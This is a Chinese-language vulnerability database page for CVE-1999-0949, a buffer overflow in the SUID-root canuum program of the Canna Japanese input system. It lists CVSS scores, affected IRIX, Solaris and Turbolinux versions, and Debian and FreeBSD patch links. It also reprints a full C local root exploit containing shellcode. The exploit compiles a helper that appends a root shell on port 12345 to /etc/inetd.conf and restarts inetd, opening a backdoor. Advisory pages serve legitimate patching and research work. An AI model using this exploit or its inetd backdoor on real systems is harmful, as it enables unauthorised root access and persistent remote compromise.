CVE-1999-0949
CVSS7.2
发布时间 :1999-11-02 00:00:00
修订时间 :2008-09-09 08:36:14
NMCOE    

[原文]Buffer overflow in canuum program for Canna input system allows local users to gain root privileges.


[CNNVD]Canna子系统'uum'缓冲区溢出漏洞(CNNVD-199911-011)

        用于Canna输入系统的canuum程序存在缓冲区溢出漏洞。本地用户可以获得根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.3SGI IRIX 6.3
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:5.3SGI IRIX 5.3
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sgi:irix:6.4SGI IRIX 6.4
cpe:/o:sun:solaris:7.0
cpe:/o:turbolinux:turbolinux:4.2
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sgi:irix:6.5SGI IRIX 6.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0949
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0949
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-011
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/757
(UNKNOWN)  BID  757

- 漏洞信息

Canna子系统'uum'缓冲区溢出漏洞
高危 缓冲区溢出
1999-11-02 00:00:00 2005-10-20 00:00:00
本地  
        用于Canna输入系统的canuum程序存在缓冲区溢出漏洞。本地用户可以获得根权限。

- 公告与补丁

        Patches are available for Debian Linux at:
         Alpha architecture:
        http://security.debian.org/dists/stable/updates/binary-alpha/canna-utils_3.5b2-24slink1_alpha.deb
         MD5 checksum: b9318bb7dcb1936c3d16c54f8c799564
        http://security.debian.org/dists/stable/updates/binary-alpha/canna_3.5b2-24slink1_alpha.deb
         MD5 checksum: 1bcbbd1c4ad3146d66b2ca10b4914ccf
        http://security.debian.org/dists/stable/updates/binary-alpha/libcanna1g-dev_3.5b2-24slink1_alpha.deb
         MD5 checksum: 05df65c96e2adfc6d1cde593ef76ca33
        http://security.debian.org/dists/stable/updates/binary-alpha/libcanna1g_3.5b2-24slink1_alpha.deb
         MD5 checksum: b1e30d11faaccbf0014c42e56949c87c
        Intel ia32 architecture:
        http://security.debian.org/dists/stable/updates/binary-i386/canna-utils_3.5b2-24slink1_i386.deb
         MD5 checksum: 45705fd8a8d230d3dd0094707eb2fac3
        http://security.debian.org/dists/stable/updates/binary-i386/canna_3.5b2-24slink1_i386.deb
         MD5 checksum: c15a54507be2fc745d55718efbae4f74
        Motorola 680x0 architecture:
        http://security.debian.org/dists/stable/updates/binary-m68k/canna-utils_3.5b2-24slink1_m68k.deb
         MD5 checksum: aa0ef7ffe8ca29a99ba882513dd29888
        http://security.debian.org/dists/stable/updates/binary-m68k/canna_3.5b2-24slink1_m68k.deb
         MD5 checksum: 4069ed58591b44a5c670fd0a91e77ae1
        http://security.debian.org/dists/stable/updates/binary-m68k/libcanna1g-dev_3.5b2-24slink1_m68k.deb
         MD5 checksum: 005a4f8f6dbdafc1f1ccdc8443ddc8ad
        http://security.debian.org/dists/stable/updates/binary-m68k/libcanna1g_3.5b2-24slink1_m68k.deb
         MD5 checksum: 5aff2c0b7b089900faff113ce8a0abab
        Patches are available for FreeBSD at:
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/japanese/Canna-3.2.2.tar.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/japanese/Canna-3.2.2.tar.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/japanese/Canna-3.2.2.tar.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/japanese/Canna-3.2.2.tar.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/japanese/Canna-3.2.2.tar.gz

- 漏洞信息 (19583)

Turbolinux 3.5 b2 'canuum' Buffer Overflow Vulnerability (EDBID:19583)
unix local
1999-11-02 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/758/info

Canna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese.

Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romaji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way.

Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.

The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'canuum' program. Canuum is a Japanese input tty frontend for Canna using uum. Certain versions have a buffer overflow via unchecked user supplied data in the -k,-c,-n options.

Since this program is installed SUID root this attack will result in a root level compromise.

/*=============================================================================
   canuum Exploit for Linux 
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/
#include    <stdio.h>

#define RETADR   1676
#define MAXBUF   2000
#define JMP_OFS  0x200
#define NOP      0x90
#define SHELL    "/tmp/pp"
#define COMPILER "gcc"


char exec[60]= 
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff";
FILE *fp;

unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

main()
{
    char            buf[MAXBUF+1];
    unsigned int    i,ip,sp;

    sprintf(buf,"%s.c",SHELL);
    if ((fp=fopen(buf,"w"))==NULL){
        printf("Can not write to %s\n",buf);
        exit(1);
    }
    fprintf(fp,"main(){setuid(0);setgid(0);");
    fprintf(fp,"system(\"echo 12345 stream tcp nowait root /bin/sh sh -i");
    fprintf(fp," >> /etc/inetd.conf; killall -HUP inetd\");}\n");
    fclose(fp);
    sprintf(buf,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
    system(buf);

    memset(buf,'a',MAXBUF);
    buf[MAXBUF]=0;

    strcat(exec,SHELL);
    memcpy(buf+300,exec,strlen(exec));
    sp=get_sp();
    ip=sp+JMP_OFS;
    printf("Jumping address = %x\n\n\n",ip);
    printf("Please execute following command after \"Segmentation Fault\"\n");
    printf("\ntelnet localhost 12345\n\n\n");
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    execl("/usr/jp/canna/bin/canuum","canuum","-k",buf,(char *)0);
}
		

- 漏洞信息

9823
Canna Input System canuum Multiple Option Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1999-11-02 Unknow
1999-11-02 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站